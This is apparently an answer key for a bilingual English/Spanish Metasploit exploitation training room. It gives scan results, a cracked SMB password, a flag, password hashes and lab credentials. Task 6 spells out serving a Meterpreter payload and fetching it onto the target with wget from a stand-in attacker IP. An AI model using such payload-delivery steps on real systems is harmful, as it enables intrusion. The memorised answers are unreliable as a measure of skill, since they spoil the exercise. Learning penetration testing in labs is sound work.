Jr Penetration Tester > Metasploit > Metasploit: Exploitation
Task 1
Introduction
- Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.
No answer needed
Task 2
Scanning
- How many ports are open on the target system?
¿Cuántos puertos están abiertos en el sistema objetivo?
5
- Using the relevant scanner, what NetBIOS name can you see?
Usando el escáner correspondiente, ¿qué nombre NetBIOS puedes ver?
ACME IT SUPPORT
- What is running on port 8000?
¿Qué se está ejecutando en el puerto 8000?
webfs/1.21
- What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
¿Cuál es la contraseña SMB del usuario “penny”? Usa la lista de palabras mencionada en la tarea anterior.
leo1234
Task 3
The Metasploit Database
- No answers needed.
No answers needed.
Task 4
Vulnerability Scanning
- Who wrote the module that allows us to check SMTP servers for open relay?
¿Quién escribió el módulo que nos permite comprobar si los servidores SMTP permiten relay abierto?
Campbell Murray
Task 5
Exploitation
- Exploit one of the critical vulnerabilities on the target VM
Explota una de las vulnerabilidades críticas en la máquina virtual objetivo.
No answer needed
- What is the content of the flag.txt file?
¿Cuál es el contenido del archivo flag.txt?
THM-5455554845
- What is the NTLM hash of the password of the user “pirate”?
¿Cuál es el hash NTLM de la contraseña del usuario “pirate”?
8ce9a3ebd1647fcc5e04025019f4b875
Task 6
Msfvenom
- Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.
Lanza la máquina virtual adjunta a esta tarea. El nombre de usuario es murphy y la contraseña es 1q2w3e4r. Puedes conectarte mediante SSH o iniciar esta máquina en el navegador. Una vez en la terminal, escribesudo su
para obtener una shell con privilegios de root; esto facilitará las cosas.
No answer needed
- Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
Crea un payload Meterpreter en formato .elf (en la AttackBox o en la máquina atacante de tu elección).
No answer needed
- Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
Transfiérelo a la máquina objetivo (puedes iniciar un servidor web en tu máquina atacante con el comandopython3 -m http.server 9000
y usawget http://IP_DE_LA_MÁQUINA_ATACANTE:9000/shell.elf
para descargarlo en la máquina objetivo).
No answer needed
- Get a meterpreter session on the target machine.
Obtén una sesión de Meterpreter en la máquina objetivo.
No answer needed
- Use a post exploitation module to dump hashes of other users on the system.
Usa un módulo de post-explotación para volcar (dump) los hashes de otros usuarios en el sistema.
No answer needed
- What is the other user’s password hash?
¿Cuál es el hash de la contraseña del otro usuario?
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Task 8
Summary
- No answer is needed..
No answers needed.